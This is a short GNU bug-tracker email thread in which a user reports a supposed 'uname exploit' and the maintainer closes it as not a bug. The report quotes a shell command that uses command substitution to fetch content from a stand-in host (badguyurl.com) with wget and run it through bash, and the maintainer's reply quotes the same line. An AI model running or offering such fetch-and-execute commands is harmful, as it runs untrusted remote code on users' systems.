|
From: | GNU bug Tracking System |
Subject: | [debbugs-tracker] bug#24328: closed (uname exploit) |
Date: | Mon, 29 Aug 2016 15:59:02 +0000 |
Your message dated Mon, 29 Aug 2016 08:58:40 -0700 with message-id <address@hidden> and subject line Re: bug#24328: uname exploit has caused the debbugs.gnu.org bug report #24328, regarding uname exploit to be marked as done. (If you believe you have received this mail in error, please contact address@hidden) -- 24328: http://debbugs.gnu.org/cgi/bugreport.cgi?bug=24328 GNU Bug Tracking System Contact address@hidden with problems
--- Begin Message ---Subject: uname exploit Date: Mon, 29 Aug 2016 02:25:03 -0500 Hi, I am unsure if you have seen this, but I am concerned about this - can or should uname be restricted to root use only? User-agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Thunderbird/45.2.0 uname \"$(bash -c \\\"$(wget http://badguyurl.com )\\\")\"
--- End Message ---
--- Begin Message ---Subject: Re: bug#24328: uname exploit Date: Mon, 29 Aug 2016 08:58:40 -0700 User-agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Thunderbird/45.2.0 Shane wrote:uname \"$(bash -c \\\"$(wget http://badguyurl.com )\\\")\"I don't see a bug here, so I'm marking this as done.
--- End Message ---
[Prev in Thread] | Current Thread | [Next in Thread] |